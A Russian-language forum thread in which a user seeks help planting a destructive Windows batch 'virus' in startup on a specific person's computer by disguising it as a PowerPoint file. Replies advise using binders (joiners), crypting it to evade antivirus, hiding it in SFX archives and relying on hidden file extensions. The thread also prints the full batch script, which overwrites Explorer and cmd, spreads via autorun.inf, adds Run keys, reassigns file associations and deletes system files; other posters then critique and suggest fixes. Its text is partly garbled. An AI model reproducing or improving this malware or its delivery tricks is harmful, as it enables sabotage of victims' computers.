Помогите добавить вирус в автозагрузку
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите добавить вирус в автозагрузку - 2010-05-13 16:17:59.496666
|
|
|
Рыча
Сообщений: 4
Оценки: 0
Присоединился: 2010-05-11 21:22:03.290000
|
Здравствуйте!
У меня есть bat-файл который при помещении в автозагрузку запарывает винду. И вот что я хочу спросить, можно ли как-нибудь сделать, что бы при запуске презентации Power Point (или, на крайний случай, другой файл) этот файл помещался незаметно в эту автозагрузку.
Заранее спасибо!
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-14 11:27:14.336666
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
Для этого твой батник нужно склеить с презентацией или другим файлом. Программы делающие это называются джойнеры. Также если на целевом компьютере есть антивирус нужно будет криптовать. В результате получиться exe файл, который будет запускать основную программу (презентацию) и незаметно твой батник.
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-14 21:14:18.636666
|
|
|
Alianna
Сообщений: 1922
Оценки: 356
Присоединился: 2010-03-02 11:27:12.343333
|
quote:
ORIGINAL: namepunk
В результате получиться exe файл, который будет запускать основную программу (презентацию) и незаметно твой батник.
Дело-то в том, что презентация-экзешник у более-менее опытного юзера, не говоря уж о более разумных людях, сразу начинает вызывать подозрение… Как вариант, можно запаковать презентацию в sfx-архив и уже к нему джойнером прикреплять батник, тогда хоть расширение будет соответствовать. И можно настроить, чтобы при распаковке sfx-архива выполнялось что-нибудь, смотри: http://www.win-rar.ru/study/part3/ferst.php
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-15 09:53:44.480000
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
Добавлю только что у многих пользователей включена опция "Скрывать расширения для зарегестрированных типов файлов". Соответственно если иконка соответствует ворду или повер пойнту то отличий видно не будет.
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-15 18:07:53.750000
|
|
|
Рыча
Сообщений: 4
Оценки: 0
Присоединился: 2010-05-11 21:22:03.290000
|
Ну, допустим, я прикрепил свой батник к архиву или какому-то файлу. Но он ведь запустится, а не добавится в автозагрузку, не так ли?
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-17 13:23:33.840000
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
Это зависит от того как ты захочешь. И от того как батник написан…
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-17 21:42:09.036666
|
|
|
Рыча
Сообщений: 4
Оценки: 0
Присоединился: 2010-05-11 21:22:03.290000
|
Вот этот батник:
[spoiler]echo off
cls
attrib +h +s +r %0
attrib +h +s +r Autorun.inf
taskkill f im Explorer.exe
del %systemroot%Explorer.exe f q
xcopy h r %0 %systemroot%Explorer.exe
del %systemroot%Driver Cachei386driver.cab f q
del %systemroot%Driver Cachei386sp3.cab f q
xcopy h r %0 CWINDOWSDriver Cachei386sp3.cab
xcopy h r %0 CWINDOWSDriver Cachei386driver.cab
attrib +r +h +s CWINDOWSDriver Cachei386driver.cab
attrib +r +h +s CWINDOWSDriver Cachei386sp3.cab
xcopy h r %0 %systemroot%Restart.exe
xcopy h r %0 %systemroot%system32Restart.exe
xcopy h r %0 cExplorer.exe
xcopy h r %0 dExplorer.exe
xcopy h r %0 eExplorer.exe
xcopy h r %0 fExplorer.exe
xcopy h r %0 fAutorun.inf
xcopy h r %0 cAutorun.inf
xcopy h r %0 dAutorun.inf
xcopy h r %0 eAutorun.inf
del %systemroot%system32cmd.exe f q
xcopy h r %0 %systemroot%system32cmd.exe
[HKEY_CURRENT_USERControl PanelDesktop]
“MenuShowDelay”=“500000000”
[HKEY_CURRENT_USERControl PanelDesktop]
“AutoEndTasks”=“0”
“HungAppTimeout”=“150000”
“WaitToKillAppTimeout”=“150000”
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAlerter]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesALG]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAppMgmt]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesBITS]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesClipSrv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventSystem]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCOMSysApp]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesBrowser]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCryptSvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDcomLaunch]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDhcp]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTrkWks]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSDTC]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDnscache]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesERSvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesFastUserSwitchingCompatibility]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceshelpsvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesHidServ]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesHTTPFilter]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesImapiService]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCiSvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPolicyAgent]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesdmserver]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesdmadmin]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMDM]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMessenger]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSwPrv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogon]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmnmsrvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetman]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetDDE]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetDDEdsdm]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNla]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesxmlprov]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNtLmSsp]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSysmonLog]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPlugPlay]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmdmPmSp]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSpooler]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesProtectedStorage]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRSVP]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasAuto]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasMan]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRDSessMgr]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcSs]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcLocator]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteRegistry]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNtmsSvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteAccess]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesseclogon]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSamSs]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswscsvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserver]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesShellHWDetection]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSCardSvr]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSCardDrv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSSDPSRV]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSENS]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicessrservice]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLmHosts]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTapiSrv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTlntSvr]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesThemes]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUPS]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesupnphost]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesuploadmgr]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVSS]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWebClient]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAudioSrv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesstisvc]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSIServer]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmi]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32Time]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWZCSVC]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmiApSrv]
“Start”=dword00000002
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanworkstation]
“Start”=dword00000002
[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorer]
“ShellState”=hex24,00,00,00,11,28,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
01,00,00,00,0d,00,00,00,00,00,00,00,02,00,00,00
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]
“NoSharedDocuments”=dword00000001
[HKEY_CURRENT_USERControl PanelDesktop]
“DragFullWindows”=“0”
[HKEY_Current_UserSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]
“NoTrayItemsDisplay”=dword00000001
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer]
“EnableAutoTray”=dword00000000
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer]
“NoViewContextMenu”=dword 00000001
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]
“NoFolderOptions”=dword0000000
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
“DisableCAD”=dword00000001
[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem]
“DisableRegistryTools”=dword00000001
[HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsInstaller]
“DisableMSI”=dword00000002
reg add HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem v DisableCAD t reg_dword d 00000001
reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun v Explorer t reg_sz d %systemroot%explorer.exe
reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun v Restart t reg_sz d %systemroot%Restart.exe
reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun v Restart.exe t reg_sz d %systemroot%system32Restart.exe
assoc .exe=.txt
assoc .bat=.txt
assoc .cmd=.txt
assoc .js=.txt
assoc .vbs=.txt
assoc .mp3=.txt
assoc .m3u=.txt
assoc .com=.txt
assoc .msc=.txt
assoc .scr=.txt
assoc .msi=.txt
assoc .php=.txt
assoc .zip=.txt
assoc .rar=.txt
assoc .nt=.txt
assoc .7z=.txt
assoc .chm=.txt
assoc .rar=.txt
assoc .zip=.txt
assoc .ace=.txt
assoc .swf=.txt
assoc .cab=.txt
assoc .ico=.txt
assoc .jpg=.txt
assoc .jpeg=.txt
assoc .bmp=.txt
assoc .gif=.txt
assoc .dll=.txt
cd %systemroot%system32
del .dll f q
del .exe f q
del .inf f q
del .msi f q
del .com f q
del .msc f q
del .lnk f q
echo off
del . f q
cls
del autorun.inf
del %0[/spoiler]
Только вот я попробовал его на виртуальной машине и чего то он не заработал… :)
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-22 21:35:38.790000
|
|
|
YaraUA
Сообщений: 3
Оценки: 0
Присоединился: 2010-05-22 20:49:57.853333
|
:D Зачем же столько… Думаю надо бы выкинуть лишние строки…. достаточно будет сломать что то одно. А в батник прописать строчку отвечающую за копирование себя в папку C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\
(Хотя разумней будет разбить программу на две части 1- копирует пакость в автозагрузку, 2-эта самая пакость) И еще не забывай не все файлы могут быть удалены….
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-23 02:49:02.240000
|
|
|
Alianna
Сообщений: 1922
Оценки: 356
Присоединился: 2010-03-02 11:27:12.343333
|
Этот батник и не будет работать. Во-первых, del не .exe или .dll, а *.exe и *.dll и т.д. Во-вторых, как ты себе представляешь удаление экзешников и длл-ок из папки system32 во время работы винды? Или они как бы и не используются ничем, прямо ни один из них? Вдобавок соглашусь с YaraUA, батник действительно слишком большой. И при помещении чего-либо в автозагрузку лучше делать то, что помещает и то, что помещаем.
Потом, помоему ты просто написал там кусок рег-файла. Если мне не отказывает память, изменение реестра через батник по-другому делается.
И под конец, имхо, в автозагрузку это и незачем кидать. Подобные вещи (с исправленными ошибками, конечно) выполняются 1 раз. Потом ребут - и если все сделано правильно, винда будет попорчена, но не невосстановима.
|
|
|
|
|
RE: Помогите добавить вирус в автозагрузку - 2010-05-23 07:30:27.980000
|
|
|
Рыча
Сообщений: 4
Оценки: 0
Присоединился: 2010-05-11 21:22:03.290000
|
Это батник не я написал, просто нашел на просторах интернета, так как сам чуть-чуть больше чем ничего понимаю в этом. А в автозагрузку для того, чтобы не спалиться. Представьте: даю я флэшку умнику одному, он запускает то, что на ней есть и….БАЦ! Не хорошо…палевно. А так он почитает, что есть на флэшке (ну или где-нибудь еще), на следующий день погуляет до ночи, запускает компьютер в полночь….OMG! и обоссыца :)
P.S.
А тут правда спойлеры не работаю? Или это я кривой?
|
|
|
|
|
|
